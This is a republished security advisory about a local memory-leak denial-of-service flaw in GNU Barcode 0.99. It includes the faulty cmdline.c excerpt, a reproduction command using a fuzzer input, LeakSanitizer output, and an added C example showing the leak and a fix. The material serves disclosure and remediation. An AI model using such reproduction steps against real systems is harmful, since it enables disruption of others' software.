GNU Barcode 0.99 Memory Leak

2018.05.30
LiquidWorm (MK)
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Vendor: The GNU Project | Free Software Foundation, Inc.
Product web page: https://www.gnu.org/software/barcode/
                  https://directory.fsf.org/wiki/Barcode
Affected version: 0.99

Summary: GNU Barcode is a tool to convert text strings to printed bars.
It supports a variety of standard codes to represent the textual strings
and creates postscript output.

Desc: GNU Barcode suffers from a memory leak vulnerability that can be
exploited to cause a DoS (Denial of Service). The vulnerability is caused
by an error in 'cmdline.c', which can be exploited to cause a memory leak
via a specially crafted file. The vulnerability is confirmed in version
0.99. Other versions may also be affected.

=================================================================================
cmdline.c:
----------

128: int commandline(struct commandline *args, int argc, char **argv,
129:                 char *errorhead)
130: {
131:     struct commandline *ptr;
132:     char *getopt_desc = (char *)calloc(512, 1);
133:     int desc_offset = 0;
134:     int opt, retval;
135:     char *value;

=================================================================================

Tested on: Ubuntu 16.04.4

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2018-5471
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5471.php

09.12.2017

--

lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B"
...
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"

showpage
%%Trailer

=================================================================
==2183==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 512 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
    #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132

Direct leak of 55 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)

SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
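
The pattern in the LeakSanitizer report above, a 512-byte calloc() buffer for the getopt() string that is never released, shown beside a form that frees it on every exit path. This is an added example, not GNU Barcode source or a vendor patch; `opt_spec`, `parse_opts`, the counting allocator and the option letters are hypothetical.

```c
/* Added illustration, not GNU Barcode source; every name here is hypothetical. */
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
struct opt_spec { int letter; int takes_arg; };   /* stand-in option table entry */
static long live_allocs;                          /* buffers not yet released */
static void *last_alloc;                          /* lets the demo reclaim a dropped buffer */
static void *counted_calloc(size_t n, size_t sz)
{
    if ((last_alloc = calloc(n, sz)) != NULL) live_allocs++;
    return last_alloc;
}
static void counted_free(void *p) { if (p) { live_allocs--; free(p); } }

/* Builds a getopt() string on the heap; release != 0 frees it at one shared exit. */
static int parse_opts(const struct opt_spec *tab, int argc, char **argv, int release)
{
    char *desc = counted_calloc(512, 1);
    int off = 0, opt, retval = 0;
    if (!desc) return -1;
    for (; tab->letter; tab++) {
        if (off + 3 > 512) { retval = -1; goto out; }   /* room for "x:" plus NUL */
        desc[off++] = (char)tab->letter;
        if (tab->takes_arg) desc[off++] = ':';
    }
    optind = 1; opterr = 0;                   /* rescan from argv[1], keep stderr quiet */
    while ((opt = getopt(argc, argv, desc)) != -1)
        if (opt == '?') { retval = -1; break; }         /* unknown option: error path */
out:
    if (release) counted_free(desc);          /* release == 0 reproduces the leak */
    return retval;
}

/* Returns how many buffers one call left allocated (0 = clean, 1 = leaked). */
long leaked_after_call(int release, int bad_option)
{
    static const struct opt_spec tab[] = { {'b', 1}, {'e', 1}, {'o', 1}, {0, 0} };
    char *argv[] = { "demo", bad_option ? "-Z" : "-b", "sample", NULL };
    long before = live_allocs, leaked;
    parse_opts(tab, 3, argv, release);
    leaked = live_allocs - before;
    if (leaked) counted_free(last_alloc);     /* reclaim so the demo itself exits clean */
    return leaked;
}

int main(void)
{
    return printf("leaky=%ld fixed=%ld\n", leaked_after_call(0, 1), leaked_after_call(1, 1)) < 0;
}
```

Building the real target with `-fsanitize=address` and re-running the command from the advisory is the corresponding check that a fix removed the `cmdline.c:132` entry from the report.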

References:

https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5471.php



Copyright 2024, cxsecurity.com

 
